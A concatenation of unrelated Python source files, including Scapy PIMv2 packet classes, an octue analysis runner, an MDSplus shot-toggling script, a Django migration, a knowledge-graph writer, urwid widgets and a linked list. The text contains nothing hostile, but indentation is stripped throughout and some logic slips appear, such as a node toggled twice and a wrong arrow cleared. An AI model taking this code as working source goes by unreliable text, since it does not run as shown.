if len(pkt) >= 2:
tlvtype = orb(pkt[1])
cls = h_classes.get(tlvtype, default_key)
return cls(pkt, **kargs)
class _PIMGenericTlvBase(Packet):
fields_desc = [ByteField("type", 0),
FieldLenField("length", None, length_of="value", fmt="B"),
BoundStrLenField("value", "",
length_from=lambda pkt: pkt.length)]
def guess_payload_class(self, p):
return conf.padding_layer
def extract_padding(self, s):
return "", s
##################################
# PIMv2 Hello
##################################
class _PIMv2GenericHello(_PIMGenericTlvBase):
name = "PIMv2 Generic Hello"
def _guess_pimv2_hello_class(p, **kargs):
return _guess_pim_tlv_class(PIMv2_HELLO_CLASSES, None, p, **kargs)
class _PIMv2HelloListField(PacketListField):
def __init__(self):
PacketListField.__init__(self, "option", [], _guess_pimv2_hello_class)
class PIMv2Hello(Packet):
name = "PIMv2 Hello Options"
fields_desc = [
_PIMv2HelloListField()
]
class PIMv2HelloHoldtime(_PIMv2GenericHello):
name = "PIMv2 Hello Options : Holdtime"
fields_desc = [
ShortField("type", 1),
FieldLenField("length", None, length_of="holdtime", fmt="!H"),
ShortField("holdtime", 105)
]
class PIMv2HelloLANPruneDelayValue(_PIMv2GenericHello):
name = "PIMv2 Hello Options : LAN Prune Delay Value"
fields_desc = [
FlagsField("t", 0, 1, [0, 1]),
BitField("propagation_delay", 500, 15),
ShortField("override_interval", 2500),
]
class PIMv2HelloLANPruneDelay(_PIMv2GenericHello):
name = "PIMv2 Hello Options : LAN Prune Delay"
fields_desc = [
ShortField("type", 2),
FieldLenField("length", None, length_of="value", fmt="!H"),
PacketListField("value", PIMv2HelloLANPruneDelayValue(),
PIMv2HelloLANPruneDelayValue,
length_from=lambda pkt: pkt.length)
]
class PIMv2HelloDRPriority(_PIMv2GenericHello):
name = "PIMv2 Hello Options : DR Priority"
fields_desc = [
ShortField("type", 19),
FieldLenField("length", None, length_of="dr_priority", fmt="!H"),
IntField("dr_priority", 1)
]
class PIMv2HelloGenerationID(_PIMv2GenericHello):
name = "PIMv2 Hello Options : Generation ID"
fields_desc = [
ShortField("type", 20),
FieldLenField(
"length", None, length_of="generation_id", fmt="!H"
),
IntField("generation_id", RandInt())
]
class PIMv2HelloStateRefreshValue(_PIMv2GenericHello):
name = "PIMv2 Hello Options : State-Refresh Value"
fields_desc = [ByteField("version", 1),
ByteField("interval", 0),
ShortField("reserved", 0)]
class PIMv2HelloStateRefresh(_PIMv2GenericHello):
name = "PIMv2 Hello Options : State-Refresh"
fields_desc = [
ShortField("type", 21),
FieldLenField(
"length", None, length_of="value", fmt="!H"
),
PacketListField("value", PIMv2HelloStateRefreshValue(),
PIMv2HelloStateRefreshValue)
]
PIMv2_HELLO_CLASSES = {
1: PIMv2HelloHoldtime,
2: PIMv2HelloLANPruneDelay,
19: PIMv2HelloDRPriority,
20: PIMv2HelloGenerationID,
21: PIMv2HelloStateRefresh,
None: _PIMv2GenericHello,
}
##################################
# PIMv2 Join/Prune
##################################
class PIMv2JoinPruneAddrsBase(_PIMGenericTlvBase):
fields_desc = [
ByteField("addr_family", 1),
ByteField("encoding_type", 0),
BitField("rsrvd", 0, 5),
BitField("sparse", 0, 1),
BitField("wildcard", 0, 1),
BitField("rpt", 1, 1),
ByteField("mask_len", 32),
IPField("src_ip", "0.0.0.0")
]
class PIMv2JoinAddrs(PIMv2JoinPruneAddrsBase):
name = "PIMv2 Join: Source Address"
class PIMv2PruneAddrs(PIMv2JoinPruneAddrsBase):
name = "PIMv2 Prune: Source Address"
class PIMv2GroupAddrs(_PIMGenericTlvBase):
name = "PIMv2 Join/Prune: Multicast Group Address"
fields_desc = [
ByteField("addr_family", 1),
ByteField("encoding_type", 0),
BitField("bidirection", 0, 1),
BitField("reserved", 0, 6),
BitField("admin_scope_zone", 0, 1),
ByteField("mask_len", 32),
IPField("gaddr", "0.0.0.0"),
BitFieldLenField("num_joins", None, size=16, count_of="join_ips"),
BitFieldLenField("num_prunes", None, size=16, count_of="prune_ips"),
PacketListField("join_ips", [], PIMv2JoinAddrs,
count_from=lambda x: x.num_joins),
PacketListField("prune_ips", [], PIMv2PruneAddrs,
count_from=lambda x: x.num_prunes),
]
class PIMv2JoinPrune(_PIMGenericTlvBase):
name = "PIMv2 Join/Prune Options"
fields_desc = [
ByteField("up_addr_family", 1),
ByteField("up_encoding_type", 0),
IPField("up_neighbor_ip", "0.0.0.0"),
ByteField("reserved", 0),
FieldLenField("num_group", None, count_of="jp_ips", fmt="B"),
ShortField("holdtime", 210),
PacketListField("jp_ips", [], PIMv2GroupAddrs,
count_from=lambda pkt: pkt.num_group)
]
bind_layers(IP, PIMv2Hdr, proto=103)
bind_layers(PIMv2Hdr, PIMv2Hello, type=0)
bind_layers(PIMv2Hdr, PIMv2JoinPrune, type=3)
|
import importlib
import logging
import os
import sys
import google.api_core.exceptions
from google.cloud import secretmanager
from octue.cloud.credentials import GCPCredentialsManager
from octue.log_handlers import apply_log_handler, get_formatter
from octue.resources import Child
from octue.resources.analysis import CLASS_MAP, Analysis
from octue.utils import gen_uuid
from twined import Twine
logger = logging.getLogger(__name__)
class Runner:
"""Runs analyses in the app framework
The Runner class provides a set of configuration parameters for use by your application, together with a range of
methods for managing input and output file parsing as well as controlling logging.
:param Union[AppFrom, callable, str] app_src: Either an instance of the AppFrom manager class which has a run() method, or a function which accepts a single parameter (the instantiated analysis), or a string pointing to an application folder (which should contain an 'app.py' function like the templates)
:param str|twined.Twine twine: path to the twine file, a string containing valid twine json, or a Twine instance
:param str|dict|_io.TextIOWrapper|None configuration_values: The strand data. Can be expressed as a string path of a *.json file (relative or absolute), as an open file-like object (containing json data), as a string of json data or as an already-parsed dict.
:param str|dict|_io.TextIOWrapper|None configuration_manifest: The strand data. Can be expressed as a string path of a *.json file (relative or absolute), as an open file-like object (containing json data), as a string of json data or as an already-parsed dict.
:param Union[str, path-like, None] output_manifest_path: Path where output data will be written
:param Union[str, dict, None] children: The children strand data. Can be expressed as a string path of a *.json file (relative or absolute), as an open file-like object (containing json data), as a string of json data or as an already-parsed dict.
:param bool skip_checks: If true, skip the check that all files in the manifest are present on disc - this can be an extremely long process for large datasets.
:param str|None project_name: name of Google Cloud project to get credentials from
:return None:
"""
def __init__(
self,
app_src,
twine="twine.json",
configuration_values=None,
configuration_manifest=None,
output_manifest_path=None,
children=None,
skip_checks=False,
project_name=None,
):
self.app_src = app_src
self.output_manifest_path = output_manifest_path
self.children = children
self.skip_checks = skip_checks
# Ensure the twine is present and instantiate it.
if isinstance(twine, Twine):
self.twine = twine
else:
self.twine = Twine(source=twine)
logger.debug("Parsed twine with strands %r", self.twine.available_strands)
# Validate and initialise configuration data
self.configuration = self.twine.validate(
configuration_values=configuration_values,
configuration_manifest=configuration_manifest,
cls=CLASS_MAP,
)
logger.debug("Configuration validated.")
self._project_name = project_name
def run(
self,
analysis_id=None,
input_values=None,
input_manifest=None,
analysis_log_level=logging.INFO,
analysis_log_handler=None,
):
"""Run an analysis
:param str|None analysis_id: UUID of analysis
:param Union[str, dict, None] input_values: the input_values strand data. Can be expressed as a string path of a *.json file (relative or absolute), as an open file-like object (containing json data), as a string of json data or as an already-parsed dict.
:param Union[str, octue.resources.manifest.Manifest, None] input_manifest: The input_manifest strand data. Can be expressed as a string path of a *.json file (relative or absolute), as an open file-like object (containing json data), as a string of json data or as an already-parsed dict.
:param str analysis_log_level: the level below which to ignore log messages
:param logging.Handler|None analysis_log_handler: the logging.Handler instance which will be used to handle logs for this analysis run. Handlers can be created as per the logging cookbook https://docs.python.org/3/howto/logging-cookbook.html but should use the format defined above in LOG_FORMAT.
:return: None
"""
if hasattr(self.twine, "credentials"):
self._populate_environment_with_google_cloud_secrets()
credentials = self.twine.credentials
else:
credentials = None
inputs = self.twine.validate(
input_values=input_values,
input_manifest=input_manifest,
credentials=credentials,
children=self.children,
cls=CLASS_MAP,
allow_missing=False,
allow_extra=False,
)
logger.debug("Inputs validated.")
if inputs["children"] is not None:
inputs["children"] = {
child["key"]: Child(name=child["key"], id=child["id"], backend=child["backend"])
for child in inputs["children"]
}
outputs_and_monitors = self.twine.prepare("monitors", "output_values", "output_manifest", cls=CLASS_MAP)
# TODO this is hacky, we need to rearchitect the twined validation so we can do this kind of thing in there
outputs_and_monitors["output_manifest"] = self._update_manifest_path(
outputs_and_monitors.get("output_manifest", None),
self.output_manifest_path,
)
analysis_id = str(analysis_id) if analysis_id else gen_uuid()
analysis_logger_name = f"{__name__} | analysis-{analysis_id}"
formatter = get_formatter()
# Apply the default stderr log handler to the analysis logger.
analysis_logger = apply_log_handler(
logger_name=analysis_logger_name, log_level=analysis_log_level, formatter=formatter
)
# Also apply the given analysis log handler if given.
if analysis_log_handler:
apply_log_handler(
logger_name=analysis_logger_name,
handler=analysis_log_handler,
log_level=analysis_log_level,
formatter=formatter,
)
# Stop messages logged by the analysis logger being repeated by the root logger.
analysis_logger.propagate = False
analysis = Analysis(
id=analysis_id,
logger=analysis_logger,
twine=self.twine,
skip_checks=self.skip_checks,
**self.configuration,
**inputs,
**outputs_and_monitors,
)
try:
if hasattr(self.app_src, "run"):
self.app_src.run(analysis)
elif isinstance(self.app_src, str):
with AppFrom(self.app_src) as app:
app.run(analysis)
else:
self.app_src(analysis)
except ModuleNotFoundError as e:
raise ModuleNotFoundError(f"{e.msg} in {os.path.abspath(self.app_src)!r}.")
except Exception as e:
analysis_logger.error(str(e))
raise e
return analysis
@staticmethod
def _update_manifest_path(manifest, pathname):
"""A Quick hack to stitch the new Pathable functionality in the 0.1.4 release into the CLI and runner.
The way we define a manifest path can be more robustly implemented as we migrate functionality into the twined
library
:param manifest:
:type manifest:
:param pathname:
:type pathname:
:return:
:rtype:
"""
if manifest is not None and hasattr(pathname, "endswith"):
if pathname.endswith(".json"):
manifest.path = os.path.split(pathname)[0]
# Otherwise do nothing and rely on manifest having its path variable set already
return manifest
def _populate_environment_with_google_cloud_secrets(self):
"""Get any secrets specified in the credentials strand from Google Cloud Secret Manager and put them in the
local environment, ready for use by the runner.
:return None:
"""
missing_credentials = tuple(
credential for credential in self.twine.credentials if credential["name"] not in os.environ
)
if not missing_credentials:
return
google_cloud_credentials = GCPCredentialsManager().get_credentials()
secrets_client = secretmanager.SecretManagerServiceClient(credentials=google_cloud_credentials)
if google_cloud_credentials is None:
project_name = self._project_name
else:
project_name = google_cloud_credentials.project_id
for credential in missing_credentials:
secret_path = secrets_client.secret_version_path(
project=project_name, secret=credential["name"], secret_version="latest"
)
try:
secret = secrets_client.access_secret_version(name=secret_path).payload.data.decode("UTF-8")
except google.api_core.exceptions.NotFound:
# No need to raise an error here as the Twine validation that follows will do so.
continue
os.environ[credential["name"]] = secret
def unwrap(fcn):
"""Recurse through wrapping to get the raw function without decorators."""
if hasattr(fcn, "__wrapped__"):
return unwrap(fcn.__wrapped__)
return fcn
class AppFrom:
"""Context manager that imports module 'app' from user's code base at a location app_path.
The manager will issue a warning if an existing module called "app" is already loaded.
The manager makes a temporary addition to the system path (to ensure app is loaded from the correct path)
The manager will unload the module (by deleting it from sys.modules) on exit, enabling
with AppFrom('/path/to/dir') as app:
Runner().run(app)
"""
def __init__(self, app_path="."):
self.app_path = os.path.abspath(os.path.normpath(app_path))
logger.debug("Initialising AppFrom context at app_path %s", self.app_path)
self.app_module = None
def __enter__(self):
# Warn on an app present on the system path
if "app" in sys.modules.keys():
logger.warning(
"Module 'app' already on system path. Using 'AppFrom' context will yield unexpected results. Avoid using 'app' as a python module, except for your main entrypoint"
)
# Insert the present directory first on the system path
sys.path.insert(0, self.app_path)
# Import the app from the present directory
self.app_module = importlib.import_module("app")
# Immediately clean up the entry to the system path (don't use "remove" because if the user has it in their
# path, this'll be an unexpected side effect, and don't do it in cleanup in case the called code inserts a path)
sys.path.pop(0)
logger.debug("Imported app at app_path and cleaned up temporary modification to sys.path %s", self.app_path)
return self
def __exit__(self, exc_type, exc_value, traceback):
# Unload the imported module
del sys.modules["app"]
logger.debug("Deleted app from sys.modules and cleaned up (app_path %s)", self.app_path)
@property
def run(self):
"""Returns the unwrapped run function from app.py in the application's root directory"""
return unwrap(self.app_module.run)
|
'''
This script runs through a range of shots and toggles the state of the data nodes associated with antenna and source voltage and current.
'''
import sys
from MDSplus import *
s1=int(sys.argv[1])
#Get shot range
if(len(sys.argv)>2) :
s2=int(sys.argv[2])
else :
s2=s1
def toggleNode(n) :
n.setOn(not n.isOn())
for s in range(s1,s2+1) :
tree=Tree('magnetics',s) #Get tree out of MDSplus
toggleNode(tree.getNode('shoelace:ant_v'))
toggleNode(tree.getNode('shoelace:ant_i'))
toggleNode(tree.getNode('shoelace:src_v'))
toggleNode(tree.getNode('shoelace:ant_i'))
print("Toggled Shoelace power nodes for shot {0:d}".format(s))
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2018-02-02 00:32
from __future__ import unicode_literals
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('email', models.EmailField(max_length=255, unique=True, verbose_name='email address')),
('user_role', models.CharField(blank=True, choices=[('Requester', 'Requester'), ('Authoriser', 'Authoriser')], max_length=100, null=True)),
('username', models.CharField(error_messages={'unique': 'A user with that username already exists.'}, help_text='Required. 30 characters or fewer. Letters, digits and @/./+/-/_ only.', max_length=30, unique=True, validators=[django.core.validators.RegexValidator('^[\\w.@+-]+$', 'Enter a valid username. This value may contain only letters, numbers and @/./+/-/_ characters.', 'invalid')])),
('first_name', models.CharField(blank=True, max_length=30)),
('last_name', models.CharField(blank=True, max_length=30)),
('date_of_birth', models.DateField()),
('phone_number', models.CharField(blank=True, max_length=30)),
('department', models.CharField(blank=True, max_length=30)),
('is_active', models.BooleanField(default=True)),
('is_admin', models.BooleanField(default=False)),
],
options={
'abstract': False,
},
),
]
|
# -*- coding: utf-8 -*-
import os
import typing
import insanity
from collections import abc
from reldata import io
from reldata.data import individual
from reldata.data import knowledge_graph
__author__ = "Patrick Hohenecker"
__copyright__ = (
"Copyright (c) 2017, Patrick Hohenecker\n"
"All rights reserved.\n"
"\n"
"Redistribution and use in source and binary forms, with or without\n"
"modification, are permitted provided that the following conditions are met:\n"
"\n"
"1. Redistributions of source code must retain the above copyright notice, this\n"
" list of conditions and the following disclaimer.\n"
"2. Redistributions in binary form must reproduce the above copyright notice,\n"
" this list of conditions and the following disclaimer in the documentation\n"
" and/or other materials provided with the distribution.\n"
"\n"
"THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\n"
"ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n"
"WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n"
"DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR\n"
"ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n"
"(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n"
"LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\n"
"ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n"
"(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n"
"SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
)
__license__ = "BSD-2-Clause"
__version__ = "2017.1"
__date__ = "Nov 12, 2017"
__maintainer__ = "Patrick Hohenecker"
__email__ = "mail@paho.at"
__status__ = "Development"
class KgWriter(object):
"""A class for writing :class:`knowledge_graph.KnowledgeGraph`s to disk."""
VOCAB_PATTERN = "{index} {name}\n"
"""str: A pattern for writing class/relation/literal definitions."""
TRIPLES_PATTERN = "{subject} {predicate} {object}\n"
"""str: A pattern for writing triples."""
TYPED_TRIPLES_PATTERN = "{type} {subject} {predicate} {object}\n"
"""str: A pattern for writing triples that are marked as positive and negative, respectively."""
# METHODS ########################################################################################################
@classmethod
def _create_membership_vectors(
cls,
kg: knowledge_graph.KnowledgeGraph,
ind: individual.Individual
) -> typing.Tuple[str, str, str]:
num_classes = len(kg.classes)
spec = ["0"] * num_classes
inf = ["0"] * num_classes
pred = ["0"] * num_classes
for c in ind.classes:
value = "1" if c.is_member else "-1"
if c.inferred:
inf[c.cls.index] = value
elif c.prediction:
pred[c.cls.index] = value
else:
spec[c.cls.index] = value
return " ".join(spec) + "\n", " ".join(inf) + "\n", " ".join(pred) + "\n"
@classmethod
def write(
cls,
kg: knowledge_graph.KnowledgeGraph,
target_dir: str,
base_name: str,
index: int = None
) -> None:
"""Writes the provided knowledge graph to the specified path.
Args:
kg (:class:`knowledge_graph.KnowledgeGraph`): The knowledge graph to write to disk.
target_dir (str): The path of the directory to place all the files in.
base_name (str): The base name to use, i.e., the prefix, included in all files' names.
index (int, optional): If this is provided, then ``input_dir`` and ``basename`` are assumed to specify a
sequence of knowledge graphs, and ``index`` specifies the element of this sequence to be written to
disk.
Raises:
ValueError: If ``target_dir`` does not refer to an existing directory.
"""
# sanitize args
insanity.sanitize_type("kg", kg, knowledge_graph.KnowledgeGraph)
target_dir = str(target_dir)
base_name = str(base_name)
if not os.path.isdir(target_dir):
raise ValueError("The directory <target_dir> does not exist: '{}'!".format(target_dir))
if index is not None:
insanity.sanitize_type("index", index, int)
insanity.sanitize_range("index", index, minimum=0)
# //////// Write Vocabulary ------------------------------------------------------------------------------------
# write classes
with open(os.path.join(target_dir, base_name + io.CLASSES_VOCAB_EXT), "w") as f:
for c in kg.classes:
f.write(cls.VOCAB_PATTERN.format(index=c.index, name=c.name))
# write literals
with open(os.path.join(target_dir, base_name + io.LITERALS_VOCAB_EXT), "w") as f:
for l in kg.literals:
f.write(cls.VOCAB_PATTERN.format(index=l.index, name=l.name))
# write relations
with open(os.path.join(target_dir, base_name + io.RELATIONS_VOCAB_EXT), "w") as f:
for r in kg.relations:
f.write(cls.VOCAB_PATTERN.format(index=r.index, name=r.name))
# //////// Write Individuals -----------------------------------------------------------------------------------
with open(os.path.join(target_dir, base_name + io.INDIVIDUALS_SPEC_EXT), "w") as f:
for i in kg.individuals:
f.write(cls.VOCAB_PATTERN.format(index=i.index, name=i.name))
# //////// Write Class Memberships -----------------------------------------------------------------------------
classes_spec = os.path.join(target_dir, base_name + io.CLASSES_SPEC_EXT)
classes_inf = os.path.join(target_dir, base_name + io.CLASSES_INF_EXT)
classes_pred = os.path.join(target_dir, base_name + io.CLASSES_PRED_EXT)
if index is not None:
classes_spec += "." + str(index)
classes_inf += "." + str(index)
classes_pred += "." + str(index)
with open(classes_spec, "w") as f_spec:
with open(classes_inf, "w") as f_inf:
with open(classes_pred, "w") as f_pred:
for i in kg.individuals:
spec, inf, pred = cls._create_membership_vectors(kg, i)
f_spec.write(spec)
f_inf.write(inf)
f_pred.write(pred)
# //////// Write Literals --------------------------------------------------------------------------------------
literals_spec = os.path.join(target_dir, base_name + io.LITERALS_SPEC_EXT)
literals_inf = os.path.join(target_dir, base_name + io.LITERALS_INF_EXT)
literals_pred = os.path.join(target_dir, base_name + io.LITERALS_PRED_EXT)
if index is not None:
literals_spec += "." + str(index)
literals_inf += "." + str(index)
literals_pred += "." + str(index)
with open(literals_spec, "w") as f_spec:
with open(literals_inf, "w") as f_inf:
with open(literals_pred, "w") as f_pred:
for i in kg.individuals:
for l in i.literals:
line = cls.TRIPLES_PATTERN.format(
subject=i.index,
predicate=l.literal.index,
object=l.value
)
if l.inferred:
f_inf.write(line)
elif l.prediction:
f_pred.write(line)
else:
f_spec.write(line)
# //////// Write Relations -------------------------------------------------------------------------------------
relations_spec = os.path.join(target_dir, base_name + io.RELATIONS_SPEC_EXT)
relations_inf = os.path.join(target_dir, base_name + io.RELATIONS_INF_EXT)
relations_pred = os.path.join(target_dir, base_name + io.RELATIONS_PRED_EXT)
if index is not None:
relations_spec += "." + str(index)
relations_inf += "." + str(index)
relations_pred += "." + str(index)
with open(relations_spec, "w") as f_spec:
with open(relations_inf, "w") as f_inf:
with open(relations_pred, "w") as f_pred:
for t in kg.triples:
line = cls.TYPED_TRIPLES_PATTERN.format(
type=("+" if t.positive else "-"),
subject=t.subject.index,
predicate=t.predicate.index,
object=t.object.index
)
if t.inferred:
f_inf.write(line)
elif t.prediction:
f_pred.write(line)
else:
f_spec.write(line)
@classmethod
def write_sequence(
cls,
seq: typing.Sequence[knowledge_graph.KnowledgeGraph],
target_dir: str,
base_name: str
) -> None:
"""Writes the provided knowledge graph to the specified path.
Args:
seq (sequence[:class:`knowledge_graph.KnowledgeGraph`]): The knowledge graph sequence to write to disk.
target_dir (str): The path of the directory to place all the files in.
base_name (str): The base name to use, i.e., the prefix, included in all files' names.
Raises:
ValueError: If ``target_dir`` does not refer to an existing directory.
"""
# sanitize args
insanity.sanitize_type("seq", seq, abc.Sequence)
insanity.sanitize_iterable("seq", seq, elements_type=knowledge_graph.KnowledgeGraph, min_length=1)
target_dir = str(target_dir)
if not os.path.isdir(target_dir):
raise ValueError("The provided <target_dir> does not exist: '{}'!".format(target_dir))
base_name = str(base_name)
# write the sequence to disk
for idx, kg in enumerate(seq):
cls.write(kg, target_dir, base_name, index=idx)
|
"""This problem was asked by Two Sigma.
Alice wants to join her school's Probability Student Club.
Membership dues are computed via one of two simple probabilistic games.
The first game: roll a die repeatedly. Stop rolling once you get a five
followed by a six. Your number of rolls is the amount you pay, in dollars.
The second game: same, except that the stopping condition
is a five followed by a five.
Which of the two games should Alice elect to play? Does it even matter?
Write a program to simulate the two games and calculate their expected value.
"""
|
"""
Wigets (purdy.wigets.py)
========================
Widgets for displaying. These are called and managed through the Screen
classes in :mod:`purdy.ui`.
"""
import urwid
# =============================================================================
# Widgets
# =============================================================================
class DividingLine(urwid.Filler):
tab_focusable = False
def __init__(self):
divider = urwid.Divider('-')
super(DividingLine, self).__init__(divider)
# -----------------------------------------------------------------------------
# CodeWidget -- box that displays code
class ScrollingIndicator(urwid.Frame):
def __init__(self):
self.up = urwid.Text(' ')
self.down = urwid.Text(' ')
# create this Frame with a solid fill in the middle and the up and
# down Text widgets as the header and footer
super(ScrollingIndicator, self).__init__(urwid.SolidFill(' '),
header=self.up, footer=self.down)
def set_up(self, is_up, focus):
if is_up and focus:
self.up.set_text('▲')
elif is_up and not focus:
self.up.set_text('△')
else:
self.down.set_text(' ')
def set_down(self, is_down, focus):
if is_down and focus:
self.down.set_text('▼')
elif is_down and not focus:
self.down.set_text('▽')
else:
self.down.set_text(' ')
def set_focus_only(self, focus):
if focus:
self.up.set_text('▮')
else:
self.up.set_text('▯')
class ScrollingListBox(urwid.ListBox):
def __init__(self, scroll_indicator, *args, **kwargs):
self.scroll_indicator = scroll_indicator
super(ScrollingListBox, self).__init__(*args, **kwargs)
def render(self, size, focus):
result = super(ScrollingListBox, self).render(size, focus)
# ends_visible() returns a list with the words "top" and/or "bottom"
# in it if the top and/or bottom of the list box is visible
#
# set our scrolling indicators based on what is visible
visible = self.ends_visible(size)
if 'top' in visible and 'bottom' in visible:
self.scroll_indicator.set_focus_only(focus)
else:
self.scroll_indicator.set_up('top' not in visible, focus)
self.scroll_indicator.set_down('bottom' not in visible, focus)
return result
def keypress(self, size, key):
if key == 'up' and self.focus_position == 0:
# don't want arrow up to change parent's focus, eat this key
return None
if key == 'down' and self.focus_position + 1 >= len(self.body):
# don't want arrow down to change parent's focus, eat this key
return None
return super().keypress(size, key)
class CodeWidget(urwid.Columns):
"""Urwid widget that displays the code. This implements the methods of
:class:`purdy.content.RenderHook` and is registered against a
:class:`purdy.ui.CodeBox` and :class:`purdy.content.Listing`. As changes
are made to the listing they will be rendered this widget.
The widget wraps an urwid ListBox, with each line in the box being a line
of code. It also provides indiciators on the right side of the screen as
to whether there is content above or below the current screen. If the
parent :class:`Screen` implementation has multiple instances of this class
active, the scroll area will also indicate which code box is focused.
The up and down arrows as well as the page-up and page-down buttons are
supported. If there are multiple code widgets, tab key will change the
focus.
"""
tab_focusable = True
# CodeWidget is a Column collection containing a ListBox of Text for the
# code and a side bar with indicators about focus and scroll position
def __init__(self, screen, auto_scroll):
"""Constructor. These objects should only be constructed by a parent
:class:`Screen` object.
:param screen: the :class:`Screen` building this code box
"""
self.screen = screen
self.auto_scroll = auto_scroll
# urwid does weird things when trying to focus an empty listing, never
# allow it to be empty
self.is_empty = True
self.walker = urwid.SimpleListWalker([urwid.Text(''), ])
scroller = ScrollingIndicator()
self.listbox = ScrollingListBox(scroller, self.walker)
layout = [self.listbox, (1, scroller)]
super(CodeWidget, self).__init__(layout)
#--- RenderHook methods
def line_inserted(self, listing, position, line):
markup = listing.render_line(line)
index = position - 1
if self.is_empty:
self.walker.contents[0] = urwid.Text(markup)
self.is_empty = False
else:
self.walker.contents.insert(index, urwid.Text(markup))
if self.auto_scroll:
# if auto scrolling, change focus to last inserted item
self.listbox.set_focus(index)
def line_removed(self, listing, position):
if len(self.walker.contents) == 1:
self.is_empty = True
self.walker.contents[0] = urwid.Text('')
else:
del self.walker.contents[position - 1]
# urwid crashes if the focus is set outside of the range and you
# try to do other operations to the box before returning to the
# event loop, fix this by setting the focus to the last item
size = len(self.walker.contents)
if size > 0:
self.listbox.set_focus(size - 1)
def line_changed(self, listing, position, line):
markup = listing.render_line(line)
index = position - 1
self.walker.contents[index].set_text(markup)
def clear(self):
self.is_empty = True
self.walker.contents.clear()
self.walker.contents.insert(0, urwid.Text(''))
class TwinContainer(urwid.Columns):
### A column with the tab_focusable attribute so the BaseWindow class
# knows to do tab focus changes on it
tab_focusable = True
|
__author__ = 'jaap'
|
#%%
# 画像・バウンディングボックス・ラベルのセットを準備する
import torch
import torch.nn as nn
image = torch.zeros((1, 3, 800, 800)).float()
bbox = torch.FloatTensor([[20, 30, 400, 500], [300, 400, 500, 600]]) # [y1, x1, y2, x2] format
labels = torch.LongTensor([6, 8]) # 0 represents background
sub_sample = 16
#%%
# VGG16を、バックボーンに使用する
# VGG16の出力特徴マップのサイズが 800//16 = 50 になるよう、小細工をする
import torchvision
dummy_img = torch.zeros((1, 3, 800, 800)).float()
model = torchvision.models.vgg16(pretrained=False)
vgg_layers = list(model.features)
req_features = []
k = dummy_img.clone()
for i in vgg_layers:
k = i(k)
if k.size()[2] < 800//16:
break
req_features.append(i)
out_channels = k.size()[1]
# 特徴量抽出器の完成
faster_rcnn_fe_extractor = nn.Sequential(*req_features)
|
#!python
class Node(object):
def __init__(self, data):
"""Initialize this node with the given data."""
self.data = data
self.next = None
def __repr__(self):
"""Return a string representation of this node."""
return 'Node({!r})'.format(self.data)
class LinkedList(object):
def __init__(self, items=None):
"""Initialize this linked list and append the given items, if any."""
self.head = None # First node
self.tail = None # Last node
self.list_length = 0
# Append given items
if items is not None:
for item in items:
self.append(item)
self.temp = self.head
def __str__(self):
"""Return a formatted string representation of this linked list."""
items = ['({!r})'.format(item) for item in self.items()]
return '[{}]'.format(' -> '.join(items))
def __repr__(self):
"""Return a string representation of this linked list."""
return 'LinkedList({!r})'.format(self.items())
def __contains__(self, item):
return True if self.find(lambda entry: entry == item) is not None else False
def __len__(self):
return self.list_length
def __iter__(self):
return self.generator()
def generator(self):
node = self.head
while node is not None:
yield node.data
node = node.next
def items(self):
"""Return a list (dynamic array) of all items in this linked list.
Best and worst case running time: O(n) for n items in the list (length)
because we always need to loop through all n nodes to get each item."""
items = [] # O(1) time to create empty list
# Start at head node
node = self.head # O(1) time to assign new variable
# Loop until node is None, which is one node too far past tail
while node is not None: # Always n iterations because no early return
items.append(node.data) # O(1) time (on average) to append to list
# Skip to next node to advance forward in linked list
node = node.next # O(1) time to reassign variable
# Now list contains items from all nodes
return items # O(1) time to return list
def is_empty(self):
"""Return a boolean indicating whether this linked list is empty."""
return self.head is None
def length(self):
"""Return the length of this linked list by traversing its nodes.
Running time: O(1) - length is stored as a variable that can be accessed in constant time"""
return self.list_length
def append(self, item):
"""Insert the given item at the tail of this linked list.
Running time: O(1) no matter how long the list, takes constant time"""
# Create new node to hold given item
node = Node(item)
# Append node after tail, if it exists
if self.tail is not None:
self.tail.next = node
self.tail = node
else:
self.head = node
self.tail = node
self.list_length += 1
def prepend(self, item):
"""Insert the given item at the head of this linked list.
Running time: O(1) Thanks to the head 'pointer' this is constant time"""
# Create new node to hold given item
node = Node(item)
# Prepend node before head, if it exists
if self.head is not None:
node.next = self.head
self.head = node
else:
self.head = node
self.tail = node
self.list_length += 1
def find(self, quality):
"""Return an item from this linked list satisfying the given quality.
Best case running time: O(1) If node is at the beginning of the list
Worst case running time: O(n) If node as at the end of the list"""
# Loop through all nodes to find item where quality(item) is True
# Check if node's data satisfies given quality function
match = None
node = self.head
while node is not None:
if quality(node.data) is True:
match = node.data
node = None
else:
node = node.next
return match
def delete(self, item):
"""Delete the given item from this linked list, or raise ValueError.
Best case running time: O(1) if node is at the beginning of the list
Worst case running time: O(n) if node is at the end of the list or doesn't exist"""
# Loop through all nodes to find one whose data matches given item
# Update previous node to skip around node with matching data
# Otherwise raise error to tell user that delete has failed
# raise ValueError('Item not found: {}'.format(item))
previous = None
found = False
node = self.head
while not found and node is not None:
if node.data == item:
# if we're not at the head, connect the previous node with the next one
if previous is not None:
previous.next = node.next
# if we ARE at the head, make the next node the head
else:
self.head = node.next
# if we're at the tail, point the tail to the previous node
if node.next is None:
self.tail = previous
self.list_length -= 1
found = True
previous = node
node = node.next
